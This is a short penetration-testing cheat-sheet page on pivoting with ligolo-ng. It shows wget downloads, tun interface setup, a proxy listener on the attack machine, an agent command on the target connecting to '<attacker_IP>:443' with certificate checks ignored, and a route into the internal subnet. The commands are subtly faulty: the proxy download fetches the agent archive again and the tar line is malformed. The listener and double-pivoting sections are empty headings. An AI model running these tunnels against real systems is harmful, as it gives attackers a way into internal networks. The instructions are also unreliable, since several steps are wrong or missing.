Pivoting & Tunneling

Below are the steps to setup ligolo-ng for pivoting:

# Download agent file
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# Download proxy file (for attack machine)
sudo wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz

# Extract the files
tar -xvf ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz

# Create and start the tun interface
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up

# Start ligolo on attack machine
./proxy -selfcert -laddr 0.0.0.0:443 

# Start ligolo on target
./agent -connect <attacker_IP>:443 -ignore-cert

# Add target network to ligolo routes on attack machine
sudo ip route add <subnet> dev ligolo

Now start the tunnel

To catch reverse shells, add listeners:

For double pivoting use the following commands:

Last updated